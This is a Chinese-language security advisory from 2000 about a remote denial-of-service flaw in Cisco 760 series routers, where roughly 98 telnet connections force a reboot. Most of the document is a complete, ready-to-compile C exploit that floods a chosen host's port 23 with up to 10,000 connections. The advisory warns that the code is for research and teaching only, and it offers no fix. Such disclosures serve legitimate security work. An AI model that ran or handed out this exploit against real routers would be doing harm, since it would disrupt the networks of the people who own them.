安全研究

安全漏洞
Cisco 760系列路由器远程拒绝服务漏洞

发布日期:2000-05-17
更新日期:2000-05-17

受影响系统:
Cisco 760系列路由器
描述:
当Cisco 760系列路由器的23端口接收到大约98个连接之后,路由器会自动重新启动。
如果攻击者持续进行连接,将使该路由器不能正常提供服务。

<* 来源: Esteve Espuna <esteve@CTV.ES> *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/* Cisco 760 Series Connection Overflow
*
*
* Written by: Tiz.Telesup
* Affected Systems: Routers Cisco 760 Series, I havn't tested anymore
* Tested on: FreeBSD 4.0 and Linux RedHat 6.0
*/


#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <net/if.h>
#include <netinet/in.h>
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>


int     net_connect (struct sockaddr_in *cs, char *server,
        unsigned short int port, char *sourceip,
        unsigned short int sourceport, int sec);


void    net_write (int fd, const char *str, ...);


unsigned long int       net_resolve (char *host);




void
usage (void)
{
        printf ("usage: ./cisco host times\n");
        exit (EXIT_FAILURE);
}


int
main (int argc, char *argv[])
{


        char                    host[256];
        int                     port,times,count,sd = 0;
        int                     m = 0;
        struct sockaddr_in      cs;


        printf ("Cisco 760 series Connection Overflow.\n");
        printf ("-------------------------------------\n");

        if (argc < 3)
        usage();

        strcpy (host, argv[1]);
        times=atoi (argv[2]);

        if ((times < 1) || (times > 10000)) /*Maximum number of connections*/
                usage();



        port =23; /* This might be changed to the telnet port of the router*/



        printf ("Host: %s Times: %d\n", host, times);
        for (count=0;count<times;count++){
                printf ("Connecting... Connection number %d \n",count);
                fflush (stdout);
                sd = net_connect (&cs, host, port, NULL, 0, 30);


                if (sd < 1) {
                        printf ("failed!\n");
                        exit (EXIT_FAILURE);
                        }



                net_write (sd, "AAAA\n\n");


        }


        exit (EXIT_SUCCESS);
}


int
net_connect (struct sockaddr_in *cs, char *server, unsigned short int port, char *sourceip,
                unsigned short int sourceport, int sec)
{
        int             n, len, error, flags;
        int             fd;
        struct timeval  tv;
        fd_set          rset, wset;


        /* first allocate a socket */
        cs->sin_family = AF_INET;
        cs->sin_port = htons (port);


        fd = socket (cs->sin_family, SOCK_STREAM, 0);
        if (fd == -1)
                return (-1);


        if (!(cs->sin_addr.s_addr = net_resolve (server))) {
                close (fd);
                return (-1);
        }


        flags = fcntl (fd, F_GETFL, 0);
        if (flags == -1) {
                close (fd);
                return (-1);
        }
        n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
        if (n == -1) {
                close (fd);
                return (-1);
        }


        error = 0;


        n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
        if (n < 0) {
                if (errno != EINPROGRESS) {
                        close (fd);
                        return (-1);
                }
        }
        if (n == 0)
                goto done;


        FD_ZERO(&rset);
        FD_ZERO(&wset);
        FD_SET(fd, &rset);
        FD_SET(fd, &wset);
        tv.tv_sec = sec;
        tv.tv_usec = 0;


        n = select(fd + 1, &rset, &wset, NULL, &tv);
        if (n == 0) {
                close(fd);
                errno = ETIMEDOUT;
                return (-1);
        }
        if (n == -1)
                return (-1);


        if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
                if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
                        len = sizeof(error);
                        if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                                errno = ETIMEDOUT;
                                return (-1);
                        }
                        if (error == 0) {
                                goto done;
                        } else {
                                errno = error;
                                return (-1);
                        }
                }
        } else
                return (-1);


done:
        n = fcntl(fd, F_SETFL, flags);
        if (n == -1)
                return (-1);
        return (fd);
}


unsigned long int
net_resolve (char *host)
{
        long            i;
        struct hostent  *he;


        i = inet_addr(host);
        if (i == -1) {
                he = gethostbyname(host);
                if (he == NULL) {
                        return (0);
                } else {
                        return (*(unsigned long *) he->h_addr);
                }
        }
        return (i);
}


void
net_write (int fd, const char *str, ...)
{
        char    tmp[8192];
        va_list vl;
        int     i;


        va_start(vl, str);
        memset(tmp, 0, sizeof(tmp));
        i = vsnprintf(tmp, sizeof(tmp), str, vl);
        va_end(vl);


        send(fd, tmp, i, 0);
        return;
}



建议:
暂无

浏览次数:6450
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障